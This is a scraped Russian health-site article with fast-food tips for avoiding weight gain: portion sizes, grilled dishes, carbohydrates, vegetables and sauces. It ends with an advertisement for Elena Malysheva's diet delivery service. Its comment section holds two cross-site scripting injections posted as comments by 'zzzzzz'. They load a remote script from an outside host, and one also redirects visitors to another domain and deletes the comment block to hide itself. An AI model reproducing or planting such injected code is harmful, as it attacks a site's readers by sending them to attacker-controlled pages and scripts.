Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как сходить в фаст фуд и ...  >>  Как сходить в фаст фуд и не поправиться?
 
Обратная связь
 

Как сходить в фаст фуд и не поправиться?

Размер шрифта
18 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Что делать, когда так хочется гамбургер или картошку фри, что мозг просто отключается, и вы как зомби идете в ближайший фаст фуд? Как сходить в фаст фуд и не поправиться?

Как сходить в фаст фуд и не поправиться?

Размер порции

Как правило, в ресторанах быстрого питания есть возможность выбрать размер порции. Не покупайте большие порции или берите большую порцию на двоих.

Состав

В ресторане быстрого питания можно получить всю информацию о содержании белков, жиров и углеводов в том или ином блюде, а также о его калорийности. Кроме того, подобную информацию можно найти в интернете.

Правильные слова

Если в названии блюда вы видите такие слова, как «гриль» и «запеченный», можете смело его брать. Однако если эти слова относятся к сандвичам, обратите внимание на калорийность хлеба и сыра и содержание в них углеводов.

Углеводы

Рогалики, маффины, картофель фри, запеченный картофель и сандвичи содержат большое количество углеводов. Постарайтесь ограничить употребление этих продуктов, например, разделите стандартную порцию на несколько частей. Или просто снимите верхнюю булочку с гамбургера.

Овощи и фрукты

Даже если вы зашли перекусить в ресторан быстрого питания, закажите салат из свежих овощей или сэндвич со свежими овощами и листьями салата. В овощах и фруктах содержится большое количество витаминов и минералов. Кроме того, они дают ощущение сытости благодаря клетчатке. Вы быстрее наедитесь, и не захотите ЕЩЕ!

Как сходить в фаст фуд и не поправиться?

Соусы

В соусах содержится большое количество углеводов и калорий. Поэтому постарайтесь ограничить количество кетчупа, майонеза, сырного и других соусов, которые попадут в ваше блюдо. Лучше всего, чтобы соусы стояли у вас на столе, и вы могли сами добавлять их в блюдо.

Ну, а если вы хотите РЕАЛЬНО похудеть, то вам на сайт Диеты Елены Малышевой. Уже готовая, правильная еда для похудения будет доставлена вам в любое удобное место и время. Вам останется только есть и худеть.

А с недавних пор худеть стало еще проще с новым приложением Диета Елены Малышевой.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.